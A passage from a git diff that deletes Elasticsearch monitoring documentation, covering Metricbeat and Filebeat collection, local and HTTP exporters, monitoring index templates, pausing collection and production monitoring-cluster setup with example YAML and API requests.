`modules.d/elasticsearch.yml` file. See -{filebeat-ref}/filebeat-module-elasticsearch.html#configuring-elasticsearch-module[Configure the {es} module]. - -IMPORTANT: If there are JSON logs, configure the `var.paths` settings to point -to them instead of the plain text logs. - -// end::configure-es-module[] --- - -. {filebeat-ref}/filebeat-starting.html[Start {filebeat}] on each node. -+ --- -NOTE: Depending on how you’ve installed {filebeat}, you might see errors related -to file ownership or permissions when you try to run {filebeat} modules. See -{beats-ref}/config-file-permissions.html[Config file ownership and permissions]. - --- - -. Check whether the appropriate indices exist on the monitoring cluster. -+ --- -For example, use the <> command to verify -that there are new `filebeat-*` indices. - -TIP: If you want to use the *Monitoring* UI in {kib}, there must also be -`.monitoring-*` indices. Those indices are generated when you collect metrics -about {stack} products. For example, see <>. - --- - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. 
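-
-As a concrete illustration of the index check earlier in this procedure, a
-request along the following lines, assuming the default `filebeat-*` index
-naming, shows whether log data has started to arrive on the monitoring cluster:
-
-[source,console]
-----------------------------------
-GET /_cat/indices/filebeat-*?v=true
-----------------------------------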
diff --git a/docs/reference/monitoring/configuring-metricbeat.asciidoc b/docs/reference/monitoring/configuring-metricbeat.asciidoc deleted file mode 100644 index 4641457d421..00000000000 --- a/docs/reference/monitoring/configuring-metricbeat.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[role="xpack"] -[testenv="gold"] -[[configuring-metricbeat]] -== Collecting {es} monitoring data with {metricbeat} - -[subs="attributes"] -++++ -Collecting monitoring data with {metricbeat} -++++ - -In 6.5 and later, you can use {metricbeat} to collect data about {es} -and ship it to the monitoring cluster, rather than routing it through exporters -as described in <>. - -image::monitoring/images/metricbeat.png[Example monitoring architecture] - -. Enable the collection of monitoring data. -+ --- -// tag::enable-collection[] -Set `xpack.monitoring.collection.enabled` to `true` on the -production cluster. By default, it is is disabled (`false`). - -You can use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": true - } -} ----------------------------------- - -If {es} {security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. -// end::enable-collection[] - -For more information, see <> and <>. --- - -. {metricbeat-ref}/metricbeat-installation-configuration.html[Install {metricbeat}] on each -{es} node in the production cluster. Failure to install on each node may result in incomplete or missing results. - -. Enable the {es} {xpack} module in {metricbeat} on each {es} node. -+ --- -For example, to enable the default configuration in the `modules.d` directory, -run the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -metricbeat modules enable elasticsearch-xpack ----------------------------------------------------------------------- - -Alternatively, you can use the {es} module, as described in the -{metricbeat-ref}/metricbeat-module-elasticsearch.html[{es} module usage for {stack} monitoring]. --- - -. Configure the {es} {xpack} module in {metricbeat} on each {es} node. -+ --- -The `modules.d/elasticsearch-xpack.yml` file contains the following settings: - -[source,yaml] ----------------------------------- - - module: elasticsearch - xpack.enabled: true - period: 10s - hosts: ["http://localhost:9200"] <1> - #scope: node <2> - #username: "user" - #password: "secret" - #ssl.enabled: true - #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] - #ssl.certificate: "/etc/pki/client/cert.pem" - #ssl.key: "/etc/pki/client/cert.key" - #ssl.verification_mode: "full" ----------------------------------- -<1> By default, the module collects {es} monitoring metrics from -`http://localhost:9200`. If that host and port number are not correct, you must -update the `hosts` setting. If you configured {es} to use encrypted -communications, you must access it via HTTPS. For example, use a `hosts` setting -like `https://localhost:9200`. -<2> By default, `scope` is set to `node` and each entry in the `hosts` list -indicates a distinct node in an {es} cluster. If you set `scope` to `cluster`, -each entry in the `hosts` list indicates a single endpoint for a distinct {es} -cluster (for example, a load-balancing proxy fronting the cluster). 
- -If Elastic {security-features} are enabled, you must also provide a user ID -and password so that {metricbeat} can collect metrics successfully: - -.. Create a user on the production cluster that has the -<>. -Alternatively, use the -<>. - -.. Add the `username` and `password` settings to the {es} module configuration -file. - -.. If TLS is enabled on the HTTP layer of your {es} cluster, you must either use `https` as the URL scheme in the `hosts` setting or add the `ssl.enabled: true` setting. Depending on the TLS configuration of your {es} cluster, you might also need to specify {metricbeat-ref}/configuration-ssl.html[additional ssl.*] settings. --- - -. Optional: Disable the system module in {metricbeat}. -+ --- -By default, the {metricbeat-ref}/metricbeat-module-system.html[system module] is -enabled. The information it collects, however, is not shown on the *Monitoring* -page in {kib}. Unless you want to use that information for other purposes, run -the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -metricbeat modules disable system ----------------------------------------------------------------------- - --- - -. Identify where to send the monitoring data. -+ --- -TIP: In production environments, we strongly recommend using a separate cluster -(referred to as the _monitoring cluster_) to store the data. Using a separate -monitoring cluster prevents production cluster outages from impacting your -ability to access your monitoring data. It also prevents monitoring activities -from impacting the performance of your production cluster. - -For example, specify the {es} output information in the {metricbeat} -configuration file (`metricbeat.yml`): - -[source,yaml] ----------------------------------- -output.elasticsearch: - # Array of hosts to connect to. - hosts: ["http://es-mon-1:9200", "http://es-mon-2:9200"] <1> - - # Optional protocol and basic auth credentials. - #protocol: "https" - #username: "elastic" - #password: "changeme" ----------------------------------- -<1> In this example, the data is stored on a monitoring cluster with nodes -`es-mon-1` and `es-mon-2`. - -If you configured the monitoring cluster to use encrypted communications, you -must access it via HTTPS. For example, use a `hosts` setting like -`https://es-mon-1:9200`. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -If {es} {security-features} are enabled on the monitoring cluster, you must -provide a valid user ID and password so that {metricbeat} can send metrics -successfully: - -.. Create a user on the monitoring cluster that has the -<>. -Alternatively, use the -<>. - -.. Add the `username` and `password` settings to the {es} output information in -the {metricbeat} configuration file. - -For more information about these configuration options, see -{metricbeat-ref}/elasticsearch-output.html[Configure the {es} output]. --- - -. {metricbeat-ref}/metricbeat-starting.html[Start {metricbeat}] on each node. - -. Disable the default collection of {es} monitoring metrics. -+ --- -Set `xpack.monitoring.elasticsearch.collection.enabled` to `false` on the -production cluster.
- -You can use the following API to change this setting: - -[source,console] ----------------------------------- -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.elasticsearch.collection.enabled": false - } -} ----------------------------------- - -If {es} {security-features} are enabled, you must have `monitor` cluster -privileges to view the cluster settings and `manage` cluster privileges -to change them. --- - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. diff --git a/docs/reference/monitoring/exporters.asciidoc b/docs/reference/monitoring/exporters.asciidoc deleted file mode 100644 index 76bf30d0b61..00000000000 --- a/docs/reference/monitoring/exporters.asciidoc +++ /dev/null @@ -1,172 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[es-monitoring-exporters]] -== Exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The purpose of exporters is to take data collected from any Elastic Stack -source and route it to the monitoring cluster. It is possible to configure -more than one exporter, but the general and default setup is to use a single -exporter. - -There are two types of exporters in {es}: - -`local`:: -The default exporter used by {es} {monitor-features}. This exporter routes data -back into the _same_ cluster. See <>. - -`http`:: -The preferred exporter, which you can use to route data into any supported -{es} cluster accessible via HTTP. Production environments should always use a -separate monitoring cluster. See <>. - -Both exporters serve the same purpose: to set up the monitoring cluster and route -monitoring data. However, they perform these tasks in very different ways. Even -though things happen differently, both exporters are capable of sending all of -the same data. - -Exporters are configurable at both the node and cluster level. Cluster-wide -settings, which are updated with the -<>, take precedence over -settings in the `elasticsearch.yml` file on each node. When you update an -exporter, it is completely replaced by the updated version of the exporter. - -IMPORTANT: It is critical that all nodes share the same setup. Otherwise, -monitoring data might be routed in different ways or to different places. - -When the exporters route monitoring data into the monitoring cluster, they use -`_bulk` indexing for optimal performance. All monitoring data is forwarded in -bulk to all enabled exporters on the same node. From there, the exporters -serialize the monitoring data and send a bulk request to the monitoring cluster. -There is no queuing--in memory or persisted to disk--so any failure during the -export results in the loss of that batch of monitoring data. This design limits -the impact on {es} and the assumption is that the next pass will succeed. - -Routing monitoring data involves indexing it into the appropriate monitoring -indices. Once the data is indexed, it exists in a monitoring index that, by -default, is named with a daily index pattern. For {es} monitoring data, this is -an index that matches `.monitoring-es-6-*`. From there, the data lives inside -the monitoring cluster and must be curated or cleaned up as necessary. 
If you do -not curate the monitoring data, it eventually fills up the nodes and the cluster -might fail due to lack of disk space. - -TIP: You are strongly recommended to manage the curation of indices and -particularly the monitoring indices. To do so, you can take advantage of the -<> or -{curator-ref-current}/index.html[Elastic Curator]. - -//TO-DO: Add information about index lifecycle management https://github.com/elastic/x-pack-elasticsearch/issues/2814 - -There is also a disk watermark (known as the flood stage -watermark), which protects clusters from running out of disk space. When this -feature is triggered, it makes all indices (including monitoring indices) -read-only until the issue is fixed and a user manually makes the index writeable -again. While an active monitoring index is read-only, it will naturally fail to -write (index) new data and will continuously log errors that indicate the write -failure. For more information, see <>. - -[discrete] -[[es-monitoring-default-exporter]] -=== Default exporters - -If a node or cluster does not explicitly define an exporter, the following -default exporter is used: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.default_local: <1> - type: local ---------------------------------------------------- -<1> The exporter name uniquely defines the exporter, but it is otherwise unused. - When you specify your own exporters, you do not need to explicitly overwrite - or reference `default_local`. - -If another exporter is already defined, the default exporter is _not_ created. -When you define a new exporter, if the default exporter exists, it is -automatically removed. - -[discrete] -[[es-monitoring-templates]] -=== Exporter templates and ingest pipelines - -Before exporters can route monitoring data, they must set up certain {es} -resources. These resources include templates and ingest pipelines. The -following table lists the templates that are required before an exporter can -route monitoring data: - -[options="header"] -|======================= -| Template | Purpose -| `.monitoring-alerts` | All cluster alerts for monitoring data. -| `.monitoring-beats` | All Beats monitoring data. -| `.monitoring-es` | All {es} monitoring data. -| `.monitoring-kibana` | All {kib} monitoring data. -| `.monitoring-logstash` | All Logstash monitoring data. -|======================= - -The templates are ordinary {es} templates that control the default settings and -mappings for the monitoring indices. - -By default, monitoring indices are created daily (for example, -`.monitoring-es-6-2017.08.26`). You can change the default date suffix for -monitoring indices with the `index.name.time_format` setting. You can use this -setting to control how frequently monitoring indices are created by a specific -`http` exporter. You cannot use this setting with `local` exporters. For more -information, see <>. - -WARNING: Some users create their own templates that match _all_ index patterns, -which therefore impact the monitoring indices that get created. It is critical -that you do not disable `_source` storage for the monitoring indices. If you do, -{kib} {monitor-features} do not work and you cannot visualize monitoring data -for your cluster. 
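As an illustration of the `index.name.time_format` setting mentioned above, the following sketch (the exporter name and host are hypothetical) configures an `http` exporter to create monthly rather than daily monitoring indices:

[source,yaml]
----
xpack.monitoring.exporters.my_remote:
  type: http
  host: ["10.1.2.3:9200"]
  index.name.time_format: YYYY-MM
----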
- -The following table lists the ingest pipelines that are required before an -exporter can route monitoring data: - -[options="header"] -|======================= -| Pipeline | Purpose -| `xpack_monitoring_2` | Upgrades X-Pack monitoring data coming from X-Pack -5.0 - 5.4 to be compatible with the format used in 5.5 {monitor-features}. -| `xpack_monitoring_6` | A placeholder pipeline that is empty. -|======================= - -Exporters handle the setup of these resources before ever sending data. If -resource setup fails (for example, due to security permissions), no data is sent -and warnings are logged. - -NOTE: Empty pipelines are evaluated on the coordinating node during indexing and -they are ignored without any extra effort. This inherently makes them a safe, -no-op operation. - -For monitoring clusters that have disabled `node.ingest` on all nodes, it is -possible to disable the use of the ingest pipeline feature. However, doing so -blocks its purpose, which is to upgrade older monitoring data as our mappings -improve over time. Beginning in 6.0, the ingest pipeline feature is a -requirement on the monitoring cluster; you must have `node.ingest` enabled on at -least one node. - -WARNING: Once any node running 5.5 or later has set up the templates and ingest -pipeline on a monitoring cluster, you must use {kib} 5.5 or later to view all -subsequent data on the monitoring cluster. The easiest way to determine -whether this update has occurred is by checking for the presence of indices -matching `.monitoring-es-6-*` (or more concretely the existence of the -new pipeline). Versions prior to 5.5 used `.monitoring-es-2-*`. - -Each resource that is created by an exporter has a `version` field, -which is used to determine whether the resource should be replaced. The `version` -field value represents the latest version of {monitor-features} that changed the -resource. If a resource is edited by someone or something external to the -{monitor-features}, those changes are lost the next time an automatic update -occurs. diff --git a/docs/reference/monitoring/how-monitoring-works.asciidoc b/docs/reference/monitoring/how-monitoring-works.asciidoc deleted file mode 100644 index 126ec1a0880..00000000000 --- a/docs/reference/monitoring/how-monitoring-works.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[how-monitoring-works]] -== How monitoring works -++++ -How it works -++++ - -Each {es} node, {ls} node, {kib} instance, and Beat instance is considered -unique in the cluster based on its persistent UUID, which is written to the -<> directory when the node or instance starts. - -Monitoring documents are just ordinary JSON documents built by monitoring each -{stack} component at a specified collection interval. If you want to alter the -templates for these indices, see <>. - -{metricbeat} is used to collect monitoring data and to ship it directly to the -monitoring cluster. 
- -To learn how to collect monitoring data, see: - -* <> -* <> -* {kibana-ref}/xpack-monitoring.html[Monitoring {kib}] -* {logstash-ref}/configuring-logstash.html[Monitoring {ls}] -* Monitoring Beats: -** {auditbeat-ref}/monitoring.html[{auditbeat}] -** {filebeat-ref}/monitoring.html[{filebeat}] -** {functionbeat-ref}/monitoring.html[{functionbeat}] -** {heartbeat-ref}/monitoring.html[{heartbeat}] -** {metricbeat-ref}/monitoring.html[{metricbeat}] -** {packetbeat-ref}/monitoring.html[{packetbeat}] -** {winlogbeat-ref}/monitoring.html[{winlogbeat}] diff --git a/docs/reference/monitoring/http-export.asciidoc b/docs/reference/monitoring/http-export.asciidoc deleted file mode 100644 index de8bbe65308..00000000000 --- a/docs/reference/monitoring/http-export.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[http-exporter]] -=== HTTP exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The `http` exporter is the preferred exporter in the {es} {monitor-features} -because it enables the use of a separate monitoring cluster. As a secondary -benefit, it avoids using a production cluster node as a coordinating node for -indexing monitoring data because all requests are HTTP requests to the -monitoring cluster. - -The `http` exporter uses the low-level {es} REST Client, which enables it to -send its data to any {es} cluster it can access through the network. Its requests -make use of the <> parameter to -reduce bandwidth whenever possible, which helps to ensure that communications -between the production and monitoring clusters are as lightweight as possible. - -The `http` exporter supports a number of settings that control how it -communicates over HTTP to remote clusters. In most cases, it is not -necessary to explicitly configure these settings. For detailed -descriptions, see <>. - -[source,yaml] ----------------------------------- -xpack.monitoring.exporters: - my_local: <1> - type: local - my_remote: <2> - type: http - host: [ "10.1.2.3:9200", ... ] <3> - auth: <4> - username: my_username - password: changeme - connection: - timeout: 6s - read_timeout: 60s - ssl: ... <5> - proxy: - base_path: /some/base/path <6> - headers: <7> - My-Proxy-Header: abc123 - My-Other-Thing: [ def456, ... ] - index.name.time_format: YYYY-MM <8> - ----------------------------------- -<1> A `local` exporter defined explicitly whose arbitrary name is `my_local`. -<2> An `http` exporter defined whose arbitrary name is `my_remote`. This name -uniquely defines the exporter but is otherwise unused. -<3> `host` is a required setting for `http` exporters. It must specify the HTTP -port rather than the transport port. The default port value is `9200`. -<4> User authentication for those using {stack} {security-features} or some other - form of user authentication protecting the cluster. -<5> See <> for all TLS/SSL settings. If not supplied, -the default node-level TLS/SSL settings are used. -<6> Optional base path to prefix any outgoing request with in order to - work with proxies. -<7> Arbitrary key/value pairs to define as headers to send with every request. - The array-based key/value format sends one header per value. 
-<8> A mechanism for changing the date suffix used by default. - -NOTE: The `http` exporter accepts an array of `hosts` and it will round robin -through the list. It is a good idea to take advantage of that feature when the -monitoring cluster contains more than one node. - -Unlike the `local` exporter, _every_ node that uses the `http` exporter attempts -to check and create the resources that it needs. The `http` exporter avoids -re-checking the resources unless something triggers it to perform the checks -again. These triggers include: - -* The production cluster's node restarts. -* A connection failure to the monitoring cluster. -* The license on the production cluster changes. -* The `http` exporter is dynamically updated (and it is therefore replaced). - -The easiest way to trigger a check is to disable, then re-enable the exporter. - -WARNING: This resource management behavior can create a hole for users that -delete monitoring resources. Since the `http` exporter does not re-check its -resources unless one of the triggers occurs, this can result in malformed index -mappings. - -Unlike the `local` exporter, the `http` exporter is inherently routing requests -outside of the cluster. This situation means that the exporter must provide a -username and password when the monitoring cluster requires one (or other -appropriate security configurations, such as TLS/SSL settings). - -IMPORTANT: When discussing security relative to the `http` exporter, it is -critical to remember that all users are managed on the monitoring cluster. This -is particularly important to remember when you move from development -environments to production environments, where you often have dedicated -monitoring clusters. - -For more information about the configuration options for the `http` exporter, -see <>. diff --git a/docs/reference/monitoring/images/architecture.png b/docs/reference/monitoring/images/architecture.png deleted file mode 100644 index 769618c0ccc..00000000000 Binary files a/docs/reference/monitoring/images/architecture.png and /dev/null differ diff --git a/docs/reference/monitoring/images/metricbeat.png b/docs/reference/monitoring/images/metricbeat.png deleted file mode 100644 index f74f8566530..00000000000 Binary files a/docs/reference/monitoring/images/metricbeat.png and /dev/null differ diff --git a/docs/reference/monitoring/index.asciidoc b/docs/reference/monitoring/index.asciidoc deleted file mode 100644 index 06974d20d09..00000000000 --- a/docs/reference/monitoring/index.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[monitor-elasticsearch-cluster]] -= Monitor a cluster - -[partintro] --- -The {stack} {monitor-features} provide a way to keep a pulse on the health and -performance of your {es} cluster. 
- -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::overview.asciidoc[] - -include::how-monitoring-works.asciidoc[] - -include::production.asciidoc[] - -include::configuring-metricbeat.asciidoc[] - -include::configuring-filebeat.asciidoc[] - -include::indices.asciidoc[] - -include::collecting-monitoring-data.asciidoc[] -:leveloffset: +1 -include::collectors.asciidoc[] -include::exporters.asciidoc[] -:leveloffset: -1 -include::local-export.asciidoc[] -include::http-export.asciidoc[] -include::pause-export.asciidoc[] - -include::troubleshooting.asciidoc[] diff --git a/docs/reference/monitoring/indices.asciidoc b/docs/reference/monitoring/indices.asciidoc deleted file mode 100644 index 3a7288aa15f..00000000000 --- a/docs/reference/monitoring/indices.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[config-monitoring-indices]] -== Configuring indices for monitoring - -<> are used to configure the indices -that store the monitoring data collected from a cluster. - -You can retrieve the templates through the `_template` API: - -[source,console] ----------------------------------- -GET /_template/.monitoring-* ----------------------------------- - -By default, the template configures one shard and one replica for the -monitoring indices. To override the default settings, add your own template: - -. Set the `template` pattern to `.monitoring-*`. -. Set the template `order` to `1`. This ensures your template is -applied after the default template, which has an order of 0. -. Specify the `number_of_shards` and/or `number_of_replicas` in the `settings` -section. - -For example, the following template increases the number of shards to five -and the number of replicas to two. - -[source,console] ----------------------------------- -PUT /_template/custom_monitoring -{ - "index_patterns": ".monitoring-*", - "order": 1, - "settings": { - "number_of_shards": 5, - "number_of_replicas": 2 - } -} ----------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_template/custom_monitoring --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -IMPORTANT: Only set the `number_of_shards` and `number_of_replicas` in the -settings section. Overriding other monitoring template settings could cause -your monitoring dashboards to stop working correctly. diff --git a/docs/reference/monitoring/local-export.asciidoc b/docs/reference/monitoring/local-export.asciidoc deleted file mode 100644 index 4a356e5fbd2..00000000000 --- a/docs/reference/monitoring/local-export.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[local-exporter]] -=== Local exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The `local` exporter is the default exporter in {monitoring}. It routes data -back into the same (local) cluster. In other words, it uses the production -cluster as the monitoring cluster. 
For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.my_local_exporter: <1> - type: local ---------------------------------------------------- -<1> The exporter name uniquely defines the exporter, but it is otherwise unused. - -This exporter exists to provide a convenient option when hardware is simply not -available. It is also a way for developers to get an idea of what their actions -do for pre-production clusters when they do not have the time or resources to -provide a separate monitoring cluster. However, this exporter has disadvantages -that impact the local cluster: - -* All indexing impacts the local cluster and the nodes that hold the monitoring -indices' shards. -* Most collectors run on the elected master node. Therefore most indexing occurs -with the elected master node as the coordinating node, which is a bad practice. -* Any usage of {monitoring} for {kib} uses the local cluster's resources for -searches and aggregations, which means that they might not be available for -non-monitoring tasks. -* If the local cluster goes down, the monitoring cluster has inherently gone -down with it (and vice versa), which generally defeats the purpose of monitoring. - -For the `local` exporter, all setup occurs only on the elected master node. This -means that if you do not see any monitoring templates or ingest pipelines, the -elected master node is having issues or it is not configured in the same way. -Unlike the `http` exporter, the `local` exporter has the advantage of accessing -the monitoring cluster's up-to-date cluster state. It can therefore always check -that the templates and ingest pipelines exist without a performance penalty. If -the elected master node encounters errors while trying to create the monitoring -resources, it logs errors, ignores that collection, and tries again after the -next collection. - -The elected master node is the only node to set up resources for the `local` -exporter. Therefore all other nodes wait for the resources to be set up before -indexing any monitoring data from their own collectors. Each of these nodes logs -a message indicating that they are waiting for the resources to be set up. - -One benefit of the `local` exporter is that it lives within the cluster and -therefore no extra configuration is required when the cluster is secured with -{stack} {security-features}. All operations, including indexing operations, that -occur from a `local` exporter make use of the internal transport mechanisms -within {es}. This behavior enables the exporter to be used without providing any -user credentials when {security-features} are enabled. - -For more information about the configuration options for the `local` exporter, -see <>. - -[[local-exporter-cleaner]] -==== Cleaner service - -One feature of the `local` exporter, which is not present in the `http` exporter, -is a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on -the elected master node. - -The role of the cleaner service is to clean, or curate, the monitoring indices -that are older than a configurable amount of time (the default is `7d`). This -cleaner exists as part of the `local` exporter as a safety mechanism. The `http` -exporter does not make use of it because it could enable a single misconfigured -node to prematurely curate data from other production clusters that share the -same monitoring cluster. 
- -In a dedicated monitoring cluster, you can use the cleaner service without -having to monitor the monitoring cluster itself. For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: false <1> -xpack.monitoring.history.duration: 3d <2> ---------------------------------------------------- - -<1> Disables the collection of data on the monitoring cluster. -<2> Lowers the default history duration from `7d` to `3d`. The minimum value is -`1d`. This setting can be modified only when using a Gold or higher level -license. For the Basic license level, it uses the default of 7 days. - -To disable the cleaner service, add a disabled local exporter: - -[source,yaml] ----- -xpack.monitoring.exporters.my_local.type: local <1> -xpack.monitoring.exporters.my_local.enabled: false <2> ----- - -<1> Adds a local exporter named `my_local` -<2> Disables the local exporter. This also disables the cleaner service. diff --git a/docs/reference/monitoring/overview.asciidoc b/docs/reference/monitoring/overview.asciidoc deleted file mode 100644 index e4f58e4060c..00000000000 --- a/docs/reference/monitoring/overview.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[role="xpack"] -[[monitoring-overview]] -== Monitoring overview -++++ -Overview -++++ - -When you monitor a cluster, you collect data from the {es} nodes, {ls} nodes, -{kib} instances, and Beats in your cluster. You can also -<>. - -All of the monitoring metrics are stored in {es}, which enables you to easily -visualize the data from {kib}. By default, the monitoring metrics are stored in -local indices. - -TIP: In production, we strongly recommend using a separate monitoring cluster. -Using a separate monitoring cluster prevents production cluster outages from -impacting your ability to access your monitoring data. It also prevents -monitoring activities from impacting the performance of your production cluster. -For the same reason, we also recommend using a separate {kib} instance for -viewing the monitoring data. - -You can use {metricbeat} to collect and ship data about {es}, {kib}, {ls}, and -Beats directly to your monitoring cluster rather than routing it through your -production cluster. The following diagram illustrates a typical monitoring -architecture with separate production and monitoring clusters: - -image::images/architecture.png[A typical monitoring environment] - -If you have the appropriate license, you can route data from multiple production -clusters to a single monitoring cluster. For more information about the -differences between various subscription levels, see: -https://www.elastic.co/subscriptions - -IMPORTANT: In general, the monitoring cluster and the clusters being monitored -should be running the same version of the stack. A monitoring cluster cannot -monitor production clusters running newer versions of the stack. If necessary, -the monitoring cluster can monitor production clusters running the latest -release of the previous major version. 
diff --git a/docs/reference/monitoring/pause-export.asciidoc b/docs/reference/monitoring/pause-export.asciidoc deleted file mode 100644 index 6cf02a1f240..00000000000 --- a/docs/reference/monitoring/pause-export.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[pause-export]] -=== Pausing data collection - -To stop generating {monitoring} data in {es}, disable data collection: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: false ---------------------------------------------------- - -When this setting is `false`, {es} monitoring data is not collected and all -monitoring data from other sources such as {kib}, Beats, and Logstash is ignored. - -You can update this setting by using the -{ref}/cluster-update-settings.html[Cluster Update Settings API]. - -If you want to collect data from sources such as {kib}, Beats, and Logstash but -not collect data about your {es} cluster, you can disable data collection -just for {es}: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.collection.enabled: true -xpack.monitoring.elasticsearch.collection.enabled: false ---------------------------------------------------- - -If you want to separately disable a specific exporter, you can specify the -`enabled` setting (which defaults to `true`) per exporter. For example: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.my_http_exporter: - type: http - host: ["10.1.2.3:9200", "10.1.2.4:9200"] - enabled: false <1> ---------------------------------------------------- -<1> Disable the named exporter. If the same name as an existing exporter is not - used, then this will create a completely new exporter that is completely - ignored. This value can be set dynamically by using cluster settings. - -NOTE: Defining a disabled exporter prevents the default exporter from being - created. - -To re-start data collection, re-enable these settings. \ No newline at end of file diff --git a/docs/reference/monitoring/production.asciidoc b/docs/reference/monitoring/production.asciidoc deleted file mode 100644 index 44c14dd7c0f..00000000000 --- a/docs/reference/monitoring/production.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[role="xpack"] -[[monitoring-production]] -== Monitoring in a production environment - -In production, you should send monitoring data to a separate _monitoring cluster_ -so that historical data is available even when the nodes you are monitoring are -not. For example, you can use {metricbeat} to ship monitoring data about {kib}, -{es}, {ls}, and Beats to the monitoring cluster. - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -If you have at least a Gold Subscription, using a dedicated monitoring cluster -also enables you to monitor multiple clusters from a central location. - -To store monitoring data in a separate cluster: - -. Set up the {es} cluster you want to use as the monitoring cluster. -For example, you might set up a two host cluster with the nodes `es-mon-1` and -`es-mon-2`. 
-+ --- -[IMPORTANT] -=============================== -* Ideally the monitoring cluster and the production cluster run on the same -{stack} version. However, a monitoring cluster on the latest release of -{major-version} also works with production clusters that use the same major -version. Monitoring clusters that use {major-version} also work with production -clusters that use the latest release of {prev-major-version}. -* There must be at least one <> in the monitoring -cluster; it does not need to be a dedicated ingest node. -=============================== --- - -.. (Optional) Verify that the collection of monitoring data is disabled on the -monitoring cluster. By default, the `xpack.monitoring.collection.enabled` setting -is `false`. -+ --- -For example, you can use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": false - } -} ----------------------------------- -// TEST[skip:security errs] --- - -.. If the {es} {security-features} are enabled on the monitoring cluster, create -users that can send and retrieve monitoring data. -+ --- -NOTE: If you plan to use {kib} to view monitoring data, username and password -credentials must be valid on both the {kib} server and the monitoring cluster. - --- - -*** If you plan to use {metricbeat} to collect data about {es} or {kib}, -create a user that has the `remote_monitoring_collector` built-in role and a -user that has the `remote_monitoring_agent` -<>. Alternatively, use the -`remote_monitoring_user` <>. - -*** If you plan to use HTTP exporters to route data through your production -cluster, create a user that has the `remote_monitoring_agent` -<>. -+ --- -For example, the -following request creates a `remote_monitor` user that has the -`remote_monitoring_agent` role: - -[source,console] ---------------------------------------------------------------- -POST /_security/user/remote_monitor -{ - "password" : "changeme", - "roles" : [ "remote_monitoring_agent"], - "full_name" : "Internal Agent For Remote Monitoring" -} ---------------------------------------------------------------- -// TEST[skip:needs-gold+-license] - -Alternatively, use the `remote_monitoring_user` <>. --- - -. Configure your production cluster to collect data and send it to the -monitoring cluster: - -** <> - -** <> - -. (Optional) -{logstash-ref}/configuring-logstash.html[Configure {ls} to collect data and send it to the monitoring cluster]. - -. (Optional) Configure the Beats to collect data and send it to the monitoring -cluster. -** {auditbeat-ref}/monitoring.html[Auditbeat] -** {filebeat-ref}/monitoring.html[Filebeat] -** {heartbeat-ref}/monitoring.html[Heartbeat] -** {metricbeat-ref}/monitoring.html[Metricbeat] -** {packetbeat-ref}/monitoring.html[Packetbeat] -** {winlogbeat-ref}/monitoring.html[Winlogbeat] - -. (Optional) Configure {kib} to collect data and send it to the monitoring cluster: - -** {kibana-ref}/monitoring-metricbeat.html[{metricbeat} collection methods] - -** {kibana-ref}/monitoring-kibana.html[Legacy collection methods] - -. (Optional) Create a dedicated {kib} instance for monitoring, rather than using -a single {kib} instance to access both your production cluster and monitoring -cluster. -+ --- -NOTE: If you log in to {kib} using SAML, Kerberos, PKI, OpenID Connect, or token -authentication providers, a dedicated {kib} instance is *required*. 
